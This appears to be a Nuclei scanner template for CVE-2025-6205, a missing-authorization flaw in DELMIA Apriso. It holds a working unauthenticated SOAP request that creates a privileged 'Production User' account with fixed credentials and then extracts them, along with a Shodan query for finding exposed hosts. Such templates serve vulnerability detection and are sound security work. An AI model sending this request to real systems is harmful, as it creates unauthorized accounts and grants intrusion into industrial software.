id: CVE-2025-6205
info:
name: DELMIA Apriso - Broken Access Control
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: high
description: |
DELMIA Apriso Release 2020 through Release 2025 contains a broken access control vulnerability caused by missing authorization, letting attackers gain privileged access to the application, exploit requires no special conditions.
remediation: |
Apply security patches from DELMIA for Release 2020 through Release 2025 to address missing authorization checks on message processing endpoints.
impact: |
Unauthenticated attackers can create privileged user accounts with production access through missing authorization checks on the message processing endpoint.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-6205
- https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6205
- https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso
classification:
cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
cvss-score: 8.8
cve-id: CVE-2025-6205
epss-score: 0.76757
epss-percentile: 0.98972
cwe-id: CWE-862
metadata:
verified: true
max-request: 1
shodan-query: title:"DELMIA Apriso"
tags: cve,cve2025,delmia,apriso,unauth,intrusive,vuln,kev,vkev
variables:
username: "LAST"
password: "9"
http:
- raw:
- |
POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml;charset=utf-8
Soapaction: "http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2"
<FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd" Version="1.0">
<Employee>
<GivenName>FIRST</GivenName>
<FamilyName>LAST</FamilyName>
<EmployeeNo>08262004</EmployeeNo>
<LoginName>{{username}}</LoginName>
<Password>{{password}}</Password>
<HireDate>2000-06-01T00:00:00</HireDate>
<SpokenLanguageID>1033</SpokenLanguageID>
<WrittenLanguageID>1033</WrittenLanguageID>
<EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate>
<LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate>
<EmployeeType>0</EmployeeType>
<DefaultFacility>C1P1</DefaultFacility>
<TrackLaborFlag>true</TrackLaborFlag>
<ResourceID NodeType="Field">
<Resource_Insert>
<Name>FIRST</Name>
<ResourceName>FIRST</ResourceName>
<ResourceType>1</ResourceType>
<FUID NodeType="Field"/>
</Resource_Insert>
</ResourceID>
<EmployeeRole>
<EmployeeID NodeType="Field"/>
<RoleID NodeType="Field">
<Role>
<Role>Production User</Role>
</Role>
</RoleID>
</EmployeeRole>
</Employee>
</FlexNet_Employees>
myExternalApplication
matchers:
- type: word
part: body
words:
- ProcessMessageASync_v2Response
- true
condition: and
extractors:
- type: dsl
dsl:
- '"Username: "+ username'
- '"Password: "+ password'
# digest: 4a0a0047304502206a8ed1a24d60ac1d8d66051ad02c939b26900ae77545675643961afd994cef9402210095a4e5b9fe49ac3253e0309e918e582a787aa3f7d605c80595e4e93486ed32ed:922c64590222798bb761d5b6d8e72950